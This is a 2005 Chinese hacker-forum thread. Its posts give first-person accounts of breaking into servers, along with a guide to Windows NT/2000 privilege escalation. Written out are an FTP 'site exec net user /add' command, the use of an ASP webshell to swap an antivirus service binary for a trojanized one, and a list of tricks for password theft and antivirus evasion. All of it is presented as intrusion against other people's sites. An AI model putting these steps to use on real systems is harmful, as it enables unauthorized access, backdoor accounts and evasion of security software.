不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D://program files//serv-u// ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。

好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:

ftp>quote site exec net user xr rain /add

在webshell上运行net user,就可以看见添加成功了。

整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。


--  作者:小飞

--  发布时间:2005-2-23 21:33:31


--  



--  作者:小飞

--  发布时间:2005-2-23 21:33:49


--  


巧用asp木马和KV2004得到管理员权限

重来没写过什么文章,这是第一次,写的不好请大家原谅,高手也不要取笑哦。这里也没什么技术可言,只是我这个菜鸟的一点心得,ok开始。。。
前段时间动网的UPfile.asp漏洞可谓闹的沸沸扬扬,这个漏洞确实很厉害,相信不少新手和我一样种了不少后门在有动网的网站上,但是asp木马的权限确实很底,除了删点文章,删点图片好象没什么用了。不行不得到管理员权限简直就辜负了发现这个漏洞的高手们~v~。好,想办法提升权限,我找啊找!网上提升权限的方法几乎都用过了,都没什么用,补丁打的很全啊!接下来用findpass想解开管理员的密码,又失败,findpass要管理员权限才有用。用pslist看看晕装的是瑞星+天网,网上的大部分工具遇上这个防御组合一般都没用了。种木马?不行一来
权限太底,二来在瑞星杀天网堵的包围下很少能活出来的。做个添加用户权限的bat文件想放到启动组中去,这个方法虽然有点傻但是有一定的可行性,晕又是权限不够加不进去。c盘下的"Program Files" "winnt" "Documents and Settings"三个文件甲都没有写权限,更不要说注册表了。郁闷了,给管理员留了句话,然后匆匆下线。
第2天上来一看,嘿嘿图被改回来了,管理员应该发现了,这次更不容易得手。登上asp木马进去看了一下,昨天传上去的几个exe被删了,还好asp木马活下来了,咦!c盘多了文件甲叫KV2004,原来管理员把瑞星卸了,安了个kv2004,进Program Files看看确实瑞星被卸了。(这里说一下,大部分的杀毒软件默认的安装路径c://Program Files//,但是kv默认的安装路径是c://kv2004//)到这里机会就来了我们可以把执行文件捆绑在kv2004上,跟随kv一起启动。因为kv不在"Program Files" "winnt" "Documents and Settings"这三个文件甲中,很大可能我可以修改

或者上传文件。行动!在kv2004下随便找个htm文件删除:(看看有无写删权限)
C://>del c://kv2004//GetLicense.htm
拒绝访问

奇怪了,再来看看文件甲属性
C://>attrib c://kv2004
S R C://KV2004

哦是只读。
C://>attrib -r -s c://kv2004

ok!在试试
C://>del c://kv2004//GetLicense.htm

成功了!好写个起用帐号和提升权限的bat文件,然后把bat文件和kv2004的系统服务文件KVSrvXP.exe捆绑起来,(注意多下种捆绑器,捆绑一

次用kv2004来扫描一次,因为很多捆绑器生成的文件kv会把他作为病毒来处理掉)准备上传了,先删掉原来的KVSrvXP.exe。
C://>del c://kv2004//KVSrvXP.exe
拒绝访问

可能是KVSrvXP.exe被windows调用中,删不掉。没办法了吗?不,删不掉我改名
C://>ren c://kv2004//KVSrvXP.exe kv.exe

OK!然后用asp木马把修改了的KVSrvXP.exe上传到kv2004中,接下来就去睡觉把。
4个小时后登上来用:
net user 起用的帐户

已经在administrators组中,接下来要关防火墙,关杀毒软件,还是种木马你随便我了,哈哈!
我觉得入侵没什么固定的模式,具体情况具体分析,杀毒软件同样也可以帮我们忙,这里我只提供了一种思路。请大家指教。


--  作者:小飞

--  发布时间:2005-2-23 21:34:20


--  



Windows NT/2000 通用的提升方法

  攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统; 2. 先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest 添加到管理员组; 3. 安装后门。

  本文简要介绍在 Windows NT4和 Windows 2000 里攻击者常用的提升权限的方法。下面是具体方法:

  方法1 :下载系统的 %windir%//repair//sam.*(WinNT 4 下是sam._ 而Windows2000下是sam )文件,然后用L0pht 等软件进行破解,只要能拿到,肯花时间,就一定可以破解。

  问题:(1 )攻击者不一定可以访问该文件(看攻击者的身份和管理员的设置);(2 )这个文件是上次系统备份时的帐号列表(也可能是第一次系统安装时的),以后更改帐号口令的话,就没用了。

  方法2 :使用pwdump(L0pht 自带的,Windows 2000下无效)或者pwdump2 ,取得系统当前的用户列表和口令加密列表,然后用L0pht 破解这个列表。

  问题:普通用户不能成功运行pwdump类程序(没有权限),例如:使用unicode漏洞进入系统时是IUSR_computer 身份,该用户一般只属于guests组的,运行pwdump类程序就会失败。

  (以上两种是离线的)

  方法3 :使用 Enum 等程序进行远程破解,猜口令。enum可以使用指定的字典对远程主机的某个用户进行破解。

  问题:(1 )如果系统设置了帐号锁定的话,破解几次失败,该帐号就锁定了,暂时不能再破解;(2 )要远程系统开放 Netbios连接,就是 TCP的139 端口,如果用防火墙过滤了的话 Enum 就无法连接到主机。

  (以上方法是通过破解获得密码的,还有直接把当前用户提升权限或者添加用户到管理员组的方法。)

  方法4 :GetAdmin(WinNT 4 下)、PipeUpAdmin (Windows 2000下),在本机运行可以把当前用户帐号加入管理员组。而 PipeUpAdmin则比较厉害,普通用户和Guests组用户都可以成功运行。

  问题:GetAdmin在 SP4有补丁修复了,不能用于高于 SP4的 WinNT 4系统,当然后来又有GetAdmin的增强版本,不过在 SP6a 下好像都不能成功运行。

  注:这一方法利用了 WinNT 4系统的安全漏洞,可以安装补丁解决这一问题。

  (此外还有变通的方法。)

  方法5 :在WinNT 4 和 Windows 2000 注册表里指定用户Shell 程序(Explorer.exe)

  时没有使用绝对路径,而是使用了一个相对路径的文件名(考虑到兼容性问题)。

  由于在系统启动时程序的搜索顺序问题使得 %Systemdrive%//Explorer.exe(操作系统安装的跟目录下的Explorer.exe)程序执行,这提供了攻击者一个机会在用户下次登录时执行他自己的程序。

  问题:攻击者必须有安装系统逻辑盘跟目录的写权限才行,而一般管理员都设置该目录普通用户禁写。

  注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。

  方法6 :木马:上传木马,然后运行木马,系统重起动后,木马就是本地登录用户的身份了,然后攻击者连接后就有了本地登录用户的权限。因为一般总是管理员本地登录系统,因此这样很可能就获得了管理员的权限。

  问题:(1 )杀毒软件或病毒防火墙可能阻止木马运行,还有可能把木马杀死。

  (2 )有的木马不能在Guests组身份下运行,这可能与它添加自动运行的方式有关;如没有权限改写注册表的自动运行位置,不能写入%system%//system32目录(一般的木马都改变文件名,然后写入系统目录,如果没有写入权限系统目录,就不能成功执行木马)。

  解决:不过也有用压缩程序(不是通常说的压缩程序,这种压缩程序把可执行程序压缩后,文件变小了,但是仍然可以正常执行)将木马压缩,从而逃过杀毒软件的特征码检测。我曾使用Aspack成功压缩了一个木马,逃过了金山毒霸正式版的检测。不过也有的木马Aspack压缩不了,如冰河。

  方法7 :Gina、GinaStub木马。虽然这个也叫木马,但是它的功能和上边的那种大不相同,因为一般的木马是在对方安装一个server端,一旦运行就可以使用client端连接到server端,并进行操作。而 ginastub 一般只有一个动态连接库文件,需要手工安装和卸载,他的功能也不是使用client端控制server端,它仅仅就是捕获用户的登录密码。

  问题:安装较麻烦,成功的可能性低,而且安装不当会造成被安装的系统不能启动。

  注:这一方法利用的不是系统的安全漏洞,因此不能通过安装补丁解决这一问题。关于Gina,可以参见我的另一篇文章《WinLogon登录管理和GINA简介》

  方法8 :本地溢出。缓冲区溢出是进行攻击的最好办法,因为一般都可以获得系统权限或者管理员权限;不过很多远程溢出攻击不需要事先有执行程序的权限,而本地溢出就恰好适合提升权限。Win NT4 的 IIS4 的 ASP扩展有一个本地溢出漏洞,Windows 2000的静态图像服务也有一个溢出漏洞,利用该漏洞,攻击者可以获得系统权限。当然 Windows NT 和 Windows 2000 还有很多程序有溢出漏洞,这是这些程序不是总在运行,因此被利用的可能性比较小。

  问题:(1 )ASP 扩展的溢出漏洞需要攻击者有向网站的脚本目录的写权限,才能把攻击程序放到网站上,然后执行。

  (2 )静态图像服务缺省没有安装,只有用户在 Windows 2000 上安装静态图像设备(如数码相机、扫描仪等)时才自动安装。

  注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。

  Windows 2000专用提升漏洞方法方法1 : Windows 2000 的输入法漏洞,利用这个漏洞任何人可以以LocalSystem 身份执行程序,从而可以用来提升权限,不过该漏洞一般限于物理接触 Windows 2000 计算机的人。当然如果开放了终端服务的话,攻击者也可以远程利用该漏洞。

  注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

  方法2 :利用 Windows 2000 的 Network DDE DSDM 服务漏洞普通用户可以LocalSystem 身份执行任意程序,可以借此更改密码、添加用户等。Guests组用户也可以成功利用该漏洞。

  问题:这个服务缺省没有启动,需要启动这个服务。

  注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

  方法3 :Windows 2000的 TELNET 服务进程建立时,该服务会创建一个命名管道,并用它来执行命令。但是,该管道的名字能被预见。如果 TELNET 发现一个已存在的管道名,它将直接用它。攻击者利用此漏洞,能预先建立一个管道名,当下一次 TELNET 创建服务进程时,便会在本地 SYSTEM 环境中运行攻击者代码。

  注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

  方法4 :WINDOWS 2K存在一个利用 Debug Registers提升权限的漏洞。如果攻击者能在 WIN2K中运行程序,利用此漏洞,他至少能取得对 %Windir%//SYSTEM32和注册表HKCR的写权。因为x86 Debug Registers DR0-7 对于所有进程都是全局共享的,因此在一个进程中设置硬件断点,将影响其它进程和服务程序。

  注:这一方法利用了 Windows 2000 系统的安全漏洞,不过到目前为止微软仍然没有补丁可以安装,但是漏洞攻击程序已经出现了,因此只能堵住攻击者的入口来阻止利用该漏洞。